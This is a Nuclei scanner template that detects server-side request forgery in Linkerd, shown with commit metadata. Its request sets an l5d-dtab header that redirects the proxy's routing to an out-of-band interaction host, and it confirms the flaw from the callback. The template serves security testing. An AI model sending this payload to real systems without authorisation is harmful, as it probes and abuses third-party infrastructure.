Files
nuclei-templates/misconfiguration/linkerd-ssrf-detect.yaml
forgedhallpass 209538baa6 refactor: Description field uniformization
* info field reorder
* reference values refactored to list
* added new lines after the id and before the protocols
* removed extra new lines
* split really long descriptions to multiple lines (part 1)
* other minor fixes
2022-04-22 13:38:41 +03:00

22 lines
464 B
YAML

id: linkerd-ssrf-detection
info:
name: Linkerd SSRF detection
author: dudez
severity: high
reference:
- https://twitter.com/nirvana_msu/status/1084144955034165248
tags: ssrf,linkerd,oast
requests:
- method: GET
path:
- "{{BaseURL}}"
headers:
l5d-dtab: /svc/* => /$/inet/{{interactsh-url}}/443
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"